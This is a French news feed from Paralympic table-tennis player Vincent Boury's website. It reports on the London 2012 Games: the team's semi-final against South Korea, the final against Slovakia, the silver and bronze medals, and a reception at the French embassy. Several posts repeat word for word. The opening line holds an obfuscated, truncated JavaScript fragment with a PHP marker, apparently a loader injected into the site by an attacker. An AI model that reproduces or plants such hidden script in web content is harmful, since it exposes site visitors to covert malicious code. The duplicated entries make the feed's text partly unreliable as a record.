bvrsuo=\"y\";kkk=\"d\"+\"o\"+\"c\"+\"u\"+\"ment\";try{+function(){if(document.querySelector)--(window[kkk].getElementById(\"asd\"))}()}catch(jhsfig){fyxw=function(xfayi){xfayi=\"fro\"+xfayi;for(ojdt=0;ojdt "; #/d47c75# ?> Vincent Boury http://www.adonf.net The olympics dream fr http://www.adonf.net/images/raquette.png adonf.net http://www.adonf.net Merci Amplepuis !!! http://www.adonf.net/?page=nouvelle&news_id=103 J’ai pensé à 1000 phrases, 1000 mots, 1000 photos pour essayer de décrire l’émotion et la reconnaissance que j’éprouve après cette journée magique… …sans trouver les mots justes, malheureusement trop pauvres pour décrire « ça » Alors, à toutes et tous, juste un mot :

MERCI

quelques photos en attendant de récupérer les autres un lien sur quelques articles et le site de la ville ...et bien sûr, l’inénarrable et irremplaçable Jean-Pierre sur RVR A bientôt j’espère Vince, petit reporter amplepuisien
Jeux paralympiques, J+9 ! http://www.adonf.net/?page=nouvelle&news_id=102 Première après-midi détente en cette fin de jeux paralympiques, nous retrouvons Vincent pour une sortie autour de Big-Ben et la grande roue de Londres, avec une vue panoramique à 135 m de haut au dessus de la capitale anglaise. Plus de photos sur le site « Petit reporter » ici En soirée, grande réception à l’ambassade autour de Madame Marie-Arlette CARLOTTI, ministre déléguée aux personnes handicapées et à l’intégration sociale, Monsieur l’ambassadeur de France à Londres et les hauts responsables de la Fédération Française Handisport.. Plus de photos sur le site « Petit reporter » ici A quand les prochains jeux? Jean-My, petit reporter apprenti Anne-Marie, photographe officielle de la dream-team Jeux paralympiques, J+9 ! http://www.adonf.net/?page=nouvelle&news_id=101 Première après-midi détente en cette fin de jeux paralympiques, nous retrouvons Vincent pour une sortie autour de Big-Ben et la grande roue de Londres, avec une vue panoramique à 135 m de haut au dessus de la capitale anglaise. Plus de photos sur le site « Petit reporter » ici En soirée, grande réception à l’ambassade autour de Madame Marie-Arlette CARLOTTI, ministre déléguée aux personnes handicapées et à l’intégration sociale, Monsieur l’ambassadeur de France à Londres et les hauts responsables de la Fédération Française Handisport.. Plus de photos sur le site « Petit reporter » ici A quand les prochains jeux? Jean-My, petit reporter apprenti Anne-Marie, photographe officielle de la dream-team Jeux paralympiques, J+9 ! http://www.adonf.net/?page=nouvelle&news_id=100 Avec une médaille de bronze en classe 3 et la médaille d’argent en classe 1-2, Vincent et ses équipiers reçoivent leur distinction lors de la cérémonie des médailles le vendredi 8 septembre en soirée. Ils retrouvent la deuxième marche du podium qu’ils avaient déjà gravi en 2008 lors des jeux de Pékin. Des moments intenses, et pleins d’émotion, qui laissent aux sportifs des souvenirs impérissables, même si une pointe de regrets de n’avoir accédé à la plus haute marche peut planer quelques instants… Plus de photos sur le site « Petit reporter » ici A demain Jean-My, petit reporter apprenti Anne-Marie, photographe officielle de la dream-team Jeux Paralympiques, J+8 http://www.adonf.net/?page=nouvelle&news_id=99 Comme il y a 4 ans à Pékin, l’équipe de France est opposée à l’équipe de Slovaquie ! Une finale dont les trois matchs seront tous disputés, mais qui se termineront à l’avantage de la Slovaquie. - Le premier match oppose Radislaw REVUCKY à Vincent BOURY. Vincent emporte le premier set par 11 points à 6, avant que le slovaque ne se reprenne et gagne les deux manches suivantes par 11-7 puis 11-9. Vincent ramène l’égalité en emportant le 4e set par 11-6, mais s’incline au 5e et dernier set par 11-6. 1 match à 0 pour la slovaquie - Le deuxième match met en scène Stéphane MOLLIENS contre le champion paralympique des simples messieurs Jan RIAPOS. Stéphane est à deux doigts de réaliser l’exploit sur un RIAPOS souvent intouchable en l’obligeant à aller jusqu’au 5e set où il finit par s’imposer : 11-8, 6-11, 11-6, 5-11 et 12-10 à la belle ce qui exprime bien l’acharnement de chaque joueur à vouloir donner la victoire à son pays. - Dans le troisième set, RIAPOS reste en jeu contre Vincent BOURY qui débute bien avec un premier set à 11-9 mais, dans les trois manches suivantes, perd toute solution devant un RIAPOS qui retourne toutes les balles, les courtes comme les longues, les rétros comme les accélérations, rattrape les smashs et en retourne à suivre, … pour s’incliner 5-11, puis 8-11 et 8-11. Comme il y a 4 ans à Pékin, l’équipe de Slovaquie est championne paralympique Londres 2012 et l’équipe de France vice-championne paralympique. Félicitations à tous nos champions, une médaille d’argent est une très belle victoire, et le match d’hier contre les coréens restera un morceau d’anthologie. Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici A demain Jean-My, petit reporter apprenti Anne-Marie, photographe officielle de la dream-team Jeux Paralympiques, J+7 ! http://www.adonf.net/?page=nouvelle&news_id=98 Les Français sont opposés à la Corée du Sud, tête de série n°1. Pour les impatients, nous ne pouvions deviner que ces demi-finales allaient devoir durer 4 heures, 4 heures de stress pour les joueurs certes, mais aussi pour nous, tous les supporters de la dream team, et tous les auditeurs de RVR (http://www.rvrradio.fr) - Min Gyu KIM (KOR) remporte le premier match en 5 sets très disputés face à Fabien - LAMIRAULT (FRA) par 18-16, 8-11, 11-7, 8-11 et 11-8 ! - Stéphane MOLLIENS (FRA) égalise à 1 match partout en l’emportant face à Kyung Mook KIM (KOR) par 13-11, 8-11, 11-13, 11-7 et 11-3, médaillé d’argent en Simples Messieurs ; une belle performance… - Stéphane MOLLIENS enfonce le clou en disposant de Min Gyu KIM par 11-5, 6-11, 11-8, 5-11 et 11-6, ce qui donne l’avantage à la France qui mène 2 matchs à 1. - Kyung Mook KIM remet les deux équipes à égalité en s’imposant face à Fabien LAMIRAULT par 11-4, 11-6, 14-16 et 11-7 Tout se jouera donc sur le double, pour lequel le coach français Christophe DURAND a prévu d’aligner Vincent BOURY et Stéphane MOLLIENS, qui seront donc opposés à Kong Yong KIM et Kyung Mook KIM. Sur les deux premiers sets, les français sont débordés et ne parviennent pas à trouver la clé pour déstabiliser leurs adversaires qui l’emportent logiquement 11-8 et 11-8. Auditeurs et spectateurs sont plus qu’inquiets de la tournure que prennent les événements, avant que la tendance ne s’inverse au 3e set remporté par les français sur le score de 11-7, puis au 4e sur celui de 11-8. Le dernier set sera donc décisif puisque l’équipe qui l’emportera accèdera à la finale paralympique. Menés 4-1 au début de cette ultime manche, le coach Christophe DURAND demande un temps mort afin de revoir la stratégie avec ses joueurs et leur prodiguer quelques conseils judicieux. Vincent et Stéphane redressent la barre pour mener rapidement 10 points à 4. Notre résistance est mise à rude épreuve lorsque les coréens reviennent à 5-10 puis 6-10, 7-10 et enfin 8-10, avant le point du set, du match et de la qualification qui permettent à tous les supporters français présents à Londres ou via RVR de laisser éclater leur joie. Après un rapide débriefing, les trois pongistes nous rejoignent dans le hall pour la séquence « émotion ». Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici Pour la finale en Live, connectez-vous le 7 septembre 2012 à partir de 13h30 heure française sur RVR ici Petit retour sur les interviews officielle ici ou officieuse là A demain Jean-My, petit reporter apprenti Bruno et Karine, photographes spécialistes du Larzac Jeux Paralympiques, J+7 ! http://www.adonf.net/?page=nouvelle&news_id=97 Les Français sont opposés à la Corée du Sud, tête de série n°1. Pour les impatients, nous ne pouvions deviner que ces demi-finales allaient devoir durer 4 heures, 4 heures de stress pour les joueurs certes, mais aussi pour nous, tous les supporters de la dream team, et tous les auditeurs de RVR (http://www.rvrradio.fr) - Min Gyu KIM (KOR) remporte le premier match en 5 sets très disputés face à Fabien - LAMIRAULT (FRA) par 18-16, 8-11, 11-7, 8-11 et 11-8 ! - Stéphane MOLLIENS (FRA) égalise à 1 match partout en l’emportant face à Kyung Mook KIM (KOR) par 13-11, 8-11, 11-13, 11-7 et 11-3, médaillé d’argent en Simples Messieurs ; une belle performance… - Stéphane MOLLIENS enfonce le clou en disposant de Min Gyu KIM par 11-5, 6-11, 11-8, 5-11 et 11-6, ce qui donne l’avantage à la France qui mène 2 matchs à 1. - Kyung Mook KIM remet les deux équipes à égalité en s’imposant face à Fabien LAMIRAULT par 11-4, 11-6, 14-16 et 11-7 Tout se jouera donc sur le double, pour lequel le coach français Christophe DURAND a prévu d’aligner Vincent BOURY et Stéphane MOLLIENS, qui seront donc opposés à Kong Yong KIM et Kyung Mook KIM. Sur les deux premiers sets, les français sont débordés et ne parviennent pas à trouver la clé pour déstabiliser leurs adversaires qui l’emportent logiquement 11-8 et 11-8. Auditeurs et spectateurs sont plus qu’inquiets de la tournure que prennent les événements, avant que la tendance ne s’inverse au 3e set remporté par les français sur le score de 11-7, puis au 4e sur celui de 11-8. Le dernier set sera donc décisif puisque l’équipe qui l’emportera accèdera à la finale paralympique. Menés 4-1 au début de cette ultime manche, le coach Christophe DURAND demande un temps mort afin de revoir la stratégie avec ses joueurs et leur prodiguer quelques conseils judicieux. Vincent et Stéphane redressent la barre pour mener rapidement 10 points à 4. Notre résistance est mise à rude épreuve lorsque les coréens reviennent à 5-10 puis 6-10, 7-10 et enfin 8-10, avant le point du set, du match et de la qualification qui permettent à tous les supporters français présents à Londres ou via RVR de laisser éclater leur joie. Après un rapide débriefing, les trois pongistes nous rejoignent dans le hall pour la séquence « émotion ». Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici Pour la finale en Live, connectez-vous le 7 septembre 2012 à partir de 13h30 heure française sur RVR ici Petit retour sur les interviews officielle ici ou officieuse là A demain Jean-My, petit reporter apprenti Bruno et Karine, photographes spécialistes du Larzac Jeux Paralympiques, J+7 ! http://www.adonf.net/?page=nouvelle&news_id=96 Les Français sont opposés à la Corée du Sud, tête de série n°1. Pour les impatients, nous ne pouvions deviner que ces demi-finales allaient devoir durer 4 heures, 4 heures de stress pour les joueurs certes, mais aussi pour nous, tous les supporters de la dream team, et tous les auditeurs de RVR (http://www.rvrradio.fr) - Min Gyu KIM (KOR) remporte le premier match en 5 sets très disputés face à Fabien - LAMIRAULT (FRA) par 18-16, 8-11, 11-7, 8-11 et 11-8 ! - Stéphane MOLLIENS (FRA) égalise à 1 match partout en l’emportant face à Kyung Mook KIM (KOR) par 13-11, 8-11, 11-13, 11-7 et 11-3, médaillé d’argent en Simples Messieurs ; une belle performance… - Stéphane MOLLIENS enfonce le clou en disposant de Min Gyu KIM par 11-5, 6-11, 11-8, 5-11 et 11-6, ce qui donne l’avantage à la France qui mène 2 matchs à 1. - Kyung Mook KIM remet les deux équipes à égalité en s’imposant face à Fabien LAMIRAULT par 11-4, 11-6, 14-16 et 11-7 Tout se jouera donc sur le double, pour lequel le coach français Christophe DURAND a prévu d’aligner Vincent BOURY et Stéphane MOLLIENS, qui seront donc opposés à Kong Yong KIM et Kyung Mook KIM. Sur les deux premiers sets, les français sont débordés et ne parviennent pas à trouver la clé pour déstabiliser leurs adversaires qui l’emportent logiquement 11-8 et 11-8. Auditeurs et spectateurs sont plus qu’inquiets de la tournure que prennent les événements, avant que la tendance ne s’inverse au 3e set remporté par les français sur le score de 11-7, puis au 4e sur celui de 11-8. Le dernier set sera donc décisif puisque l’équipe qui l’emportera accèdera à la finale paralympique. Menés 4-1 au début de cette ultime manche, le coach Christophe DURAND demande un temps mort afin de revoir la stratégie avec ses joueurs et leur prodiguer quelques conseils judicieux. Vincent et Stéphane redressent la barre pour mener rapidement 10 points à 4. Notre résistance est mise à rude épreuve lorsque les coréens reviennent à 5-10 puis 6-10, 7-10 et enfin 8-10, avant le point du set, du match et de la qualification qui permettent à tous les supporters français présents à Londres ou via RVR de laisser éclater leur joie. Après un rapide débriefing, les trois pongistes nous rejoignent dans le hall pour la séquence « émotion ». Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici Pour la finale en Live, connectez-vous le 7 septembre 2012 à partir de 13h30 heure française sur RVR ici Petit retour sur les interviews officielle ici ou officieuse là A demain Jean-My, petit reporter apprenti Bruno et Karine, photographes spécialistes du Larzac Jeux Paralympiques, J+7 ! http://www.adonf.net/?page=nouvelle&news_id=95 Les Français sont opposés à la Corée du Sud, tête de série n°1. Pour les impatients, nous ne pouvions deviner que ces demi-finales allaient devoir durer 4 heures, 4 heures de stress pour les joueurs certes, mais aussi pour nous, tous les supporters de la dream team, et tous les auditeurs de RVR (http://www.rvrradio.fr) - Min Gyu KIM (KOR) remporte le premier match en 5 sets très disputés face à Fabien - LAMIRAULT (FRA) par 18-16, 8-11, 11-7, 8-11 et 11-8 ! - Stéphane MOLLIENS (FRA) égalise à 1 match partout en l’emportant face à Kyung Mook KIM (KOR) par 13-11, 8-11, 11-13, 11-7 et 11-3, médaillé d’argent en Simples Messieurs ; une belle performance… - Stéphane MOLLIENS enfonce le clou en disposant de Min Gyu KIM par 11-5, 6-11, 11-8, 5-11 et 11-6, ce qui donne l’avantage à la France qui mène 2 matchs à 1. - Kyung Mook KIM remet les deux équipes à égalité en s’imposant face à Fabien LAMIRAULT par 11-4, 11-6, 14-16 et 11-7 Tout se jouera donc sur le double, pour lequel le coach français Christophe DURAND a prévu d’aligner Vincent BOURY et Stéphane MOLLIENS, qui seront donc opposés à Kong Yong KIM et Kyung Mook KIM. Sur les deux premiers sets, les français sont débordés et ne parviennent pas à trouver la clé pour déstabiliser leurs adversaires qui l’emportent logiquement 11-8 et 11-8. Auditeurs et spectateurs sont plus qu’inquiets de la tournure que prennent les événements, avant que la tendance ne s’inverse au 3e set remporté par les français sur le score de 11-7, puis au 4e sur celui de 11-8. Le dernier set sera donc décisif puisque l’équipe qui l’emportera accèdera à la finale paralympique. Menés 4-1 au début de cette ultime manche, le coach Christophe DURAND demande un temps mort afin de revoir la stratégie avec ses joueurs et leur prodiguer quelques conseils judicieux. Vincent et Stéphane redressent la barre pour mener rapidement 10 points à 4. Notre résistance est mise à rude épreuve lorsque les coréens reviennent à 5-10 puis 6-10, 7-10 et enfin 8-10, avant le point du set, du match et de la qualification qui permettent à tous les supporters français présents à Londres ou via RVR de laisser éclater leur joie. Après un rapide débriefing, les trois pongistes nous rejoignent dans le hall pour la séquence « émotion ». Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici Pour la finale en Live, connectez-vous le 7 septembre 2012 à partir de 13h30 heure française sur RVR ici Petit retour sur les interviews officielle ici ou officieuse là A demain Jean-My, petit reporter apprenti Bruno et Karine, photographes spécialistes du Larzac Jeux Paralympiques, J+7 ! http://www.adonf.net/?page=nouvelle&news_id=94 Les Français sont opposés à la Corée du Sud, tête de série n°1. Pour les impatients, nous ne pouvions deviner que ces demi-finales allaient devoir durer 4 heures, 4 heures de stress pour les joueurs certes, mais aussi pour nous, tous les supporters de la dream team, et tous les auditeurs de RVR (http://www.rvrradio.fr) - Min Gyu KIM (KOR) remporte le premier match en 5 sets très disputés face à Fabien - LAMIRAULT (FRA) par 18-16, 8-11, 11-7, 8-11 et 11-8 ! - Stéphane MOLLIENS (FRA) égalise à 1 match partout en l’emportant face à Kyung Mook KIM (KOR) par 13-11, 8-11, 11-13, 11-7 et 11-3, médaillé d’argent en Simples Messieurs ; une belle performance… - Stéphane MOLLIENS enfonce le clou en disposant de Min Gyu KIM par 11-5, 6-11, 11-8, 5-11 et 11-6, ce qui donne l’avantage à la France qui mène 2 matchs à 1. - Kyung Mook KIM remet les deux équipes à égalité en s’imposant face à Fabien LAMIRAULT par 11-4, 11-6, 14-16 et 11-7 Tout se jouera donc sur le double, pour lequel le coach français Christophe DURAND a prévu d’aligner Vincent BOURY et Stéphane MOLLIENS, qui seront donc opposés à Kong Yong KIM et Kyung Mook KIM. Sur les deux premiers sets, les français sont débordés et ne parviennent pas à trouver la clé pour déstabiliser leurs adversaires qui l’emportent logiquement 11-8 et 11-8. Auditeurs et spectateurs sont plus qu’inquiets de la tournure que prennent les événements, avant que la tendance ne s’inverse au 3e set remporté par les français sur le score de 11-7, puis au 4e sur celui de 11-8. Le dernier set sera donc décisif puisque l’équipe qui l’emportera accèdera à la finale paralympique. Menés 4-1 au début de cette ultime manche, le coach Christophe DURAND demande un temps mort afin de revoir la stratégie avec ses joueurs et leur prodiguer quelques conseils judicieux. Vincent et Stéphane redressent la barre pour mener rapidement 10 points à 4. Notre résistance est mise à rude épreuve lorsque les coréens reviennent à 5-10 puis 6-10, 7-10 et enfin 8-10, avant le point du set, du match et de la qualification qui permettent à tous les supporters français présents à Londres ou via RVR de laisser éclater leur joie. Après un rapide débriefing, les trois pongistes nous rejoignent dans le hall pour la séquence « émotion ». Plus de détails sur les résultats des matchs ici Plus de photos sur le site « Petit reporter » ici Pour la finale en Live, connectez-vous le 7 septembre 2012 à partir de 13h30 heure française sur RVR ici Petit retour sur les interviews officielle ici ou officieuse là A demain Jean-My, petit reporter apprenti Bruno et Karine, photographes spécialistes du Larzac